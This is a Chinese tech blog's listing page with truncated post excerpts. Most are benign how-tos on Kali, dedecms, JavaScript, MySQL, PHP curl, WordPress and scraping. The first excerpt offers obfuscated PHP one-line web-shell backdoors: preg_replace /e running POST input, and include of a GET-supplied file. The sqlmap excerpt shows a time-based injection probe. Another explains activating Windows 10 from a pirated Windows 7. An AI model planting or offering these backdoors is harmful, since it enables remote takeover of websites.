强悍的PHP一句话后门

强悍的PHP一句话后门
1、 $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $hh("/[discuz]/e",$_POST['h'],"Access"); //菜刀一句话 2、 $filename=$_GET['xbid']; include ($filename); //危险的include函数,直接编译任何文件为php格式运行 3、 $reg="c"."o"."p"."y"; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); //重命名任何文件 4、 $gzid = "p"."r"."e...

Kali解决不全屏、不能拖拽、复制的毛病之安装vm. 主机虚拟机之间的复制粘贴

Kali解决不全屏、不能拖拽、复制的毛病之安装vm. 主机虚拟机之间的复制粘贴
估计看着标题会有人会吐槽,你会就别说了!嘿嘿,下面开始:   本篇文章无需观看了,请移步至这里:虚拟机kali linux    https://woj.app/980.html   -------------------------------------------------------------------------------------------------   0x1: 首先打开虚拟机上的Kali,然后在虚拟状态栏(最上面那一排)---->虚拟机------>安装vmw...

sqlmap用户手册

sqlmap用户手册
当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数 if(now()=sysdate(),sleep(3),2) 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是...

dedecms5.7整合百度编辑器UEditor1.4.3版本插件

dedecms5.7整合百度编辑器UEditor1.4.3版本插件
首先下载对应的版本百度编辑器,我用的GBK版本的。 http://pan.baidu.com/s/1eQXik9s 然后找到网站目录中的如下文件: /include/inc/inc_fun_funAdmin.php 在其中添加如下代码,总共两个,愿意用哪个就用哪个,本人用第一个,第二个注释了。如果你用的是UTF-8就把下面的改为UTF-8呦。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 3...

js表单点击提交按钮后变成灰色(防止表单重复提交实现代码)

js表单点击提交按钮后变成灰色(防止表单重复提交实现代码)
表单点击提交按钮后变成灰色这种做法就是为了防止用户重复提交数据防,我们利用了form的一个属性disabled禁止按钮使用,代码如下: <input type="button" value="提交" onclick="javascript:{this.disabled=true;document.form1.submit();}"> 例子代码如下: <form name="form1" method="POST" action="http://www.xiariboke.com" target="_blank"> <in...

mysql随机更新50条数据 语句

mysql随机更新50条数据 语句
UPDATE `abc`.`products` SET `products_status` = '1' WHERE `products_status`=0  ORDER BY RAND() LIMIT 50   复杂的版本: UPDATE `abc`.`products` SET `products_status` = '1' WHERE `products`.`products_id` in (select t.products_id from (select * from products where `products_status`=0  ORDER BY RAND() LIMIT 50)as t)

php curl_getinfo的巧用

php curl_getinfo的巧用
最近使用curl的时候,发现了一个比较好用的函数,当然是初级者适用的一个函数,就是curl_getinfo(), 在抓取一个页面的时候,会遇到302页面跳转的情况,刚开始处理的时候,是用curl抓取一个域名页面的内容,适用curl_exec,抓取页面全部内容,然后用正则匹配出来用户域名url,通过此域名再次抓取此地址的内容,这样做挺麻烦的,后来发现curl_getinfo(),返回来一个数组类型的...

[转载]win10安装版永久激活方法

[转载]win10安装版永久激活方法
win10官方永久激活方法 win7升级win10 永久激活方法 2015年10月wn10激活新谅,亲测有效!小伙伴们行动起来,升级win10吧! 一、准备条件: 首先你要有一个已经激活的win7系统,不管正版盗版,只要是显示激活了不可以。一个win10的镜像或者光盘或者解压包。 二、在已激活的win7系统上,打开win10的镜像文件(虚拟光驱打与打开或者直接用RAR解压出来都可以),我这里以虚拟光...

快速解决WordPress后台编辑器无法切换”可视化”与”文本”标签

快速解决WordPress后台编辑器无法切换”可视化”与”文本”标签
不少朋友反馈,升级 WordPress 简体中文版后,WordPress 文章编辑界面点击“添加媒体”“可视化”“从常用标签中选择”无反应。这个问题可是困扰本博主4个小时啊!!!! 如图: 修复 WORDPRESS 文章编辑界面点击“添加媒体”“可视化”“从常用标签中选择”无反应 最近在升级一个网站后,也遇到了这个问题,这个问题可是真心困扰了我好几个小时,知道是JS错误,但是不知道为什么会报错...

利用QueryList多线程插件批量下载太平洋电脑网壁纸,涉及到采集gzip页面,很容易被当作乱码

利用QueryList多线程插件批量下载太平洋电脑网壁纸,涉及到采集gzip页面,很容易被当作乱码
PHP采集,演示QueryList3.0多线程插件使用技巧,多线程批量采集页面同时批量下载图片;以及采集gzip页面,gzip页面很容易被误以为是乱码,实际上是经过压缩过的页面,解压后即可看到原网页内容。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 <?php require '/QueryList/QueryList.class.php'; $urls = array(...